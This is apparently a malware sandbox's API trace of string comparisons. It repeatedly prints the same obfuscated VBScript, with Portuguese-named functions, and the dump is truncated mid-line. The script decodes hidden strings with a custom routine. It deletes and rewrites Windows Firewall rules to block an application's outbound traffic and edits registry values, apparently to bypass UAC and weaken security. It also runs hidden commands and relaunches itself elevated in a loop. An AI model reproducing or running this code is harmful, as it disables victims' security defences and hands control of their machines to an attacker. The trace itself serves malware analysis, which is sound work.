bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.305] wcsncmp (_String1="sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.305] wcsncmp (_String1="r + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0226.305] wcsncmp (_String1=" + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.305] wcsncmp (_String1="+ chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", 